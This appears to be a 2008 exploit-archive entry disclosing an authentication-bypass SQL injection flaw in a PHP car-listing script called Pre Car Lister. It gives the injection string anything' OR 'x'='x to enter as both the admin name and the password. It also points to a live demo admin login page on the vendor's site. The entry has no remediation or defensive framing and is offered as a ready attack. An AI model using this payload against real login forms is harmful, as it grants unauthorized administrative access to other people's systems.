id: 4115
date: 11/07/2008
title: PHP Auto Listings Script (Auth Bypass) SQL Injection Vuln
author: r45c4l
cves: 

=========================================================
PHP Auto Listings Script (Auth Bypass) SQL Injection Vuln
=========================================================



################################################################ 
# 
# Author: r45c4l  
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: Pre Car Lister (Auth Bypass) SQl Injection Vulnerability
# 
# 
###########################################################
#
# Script Vendor: http://www.preproject.com/projectDetail.asp?projectID=226
#
###########################################################
 
     Go To Admin Panel :

       Login With this information :

	Admin : anything' OR 'x'='x

	pass  : anything' OR 'x'='x


    Live Demo : 

	http://www.preproject.com/abc/carlister/adminlogin.php


###########################################################
#
#  Bug discovered : 06 Nov 2008
###########################################################




#  0day.today [2023-03-22]  #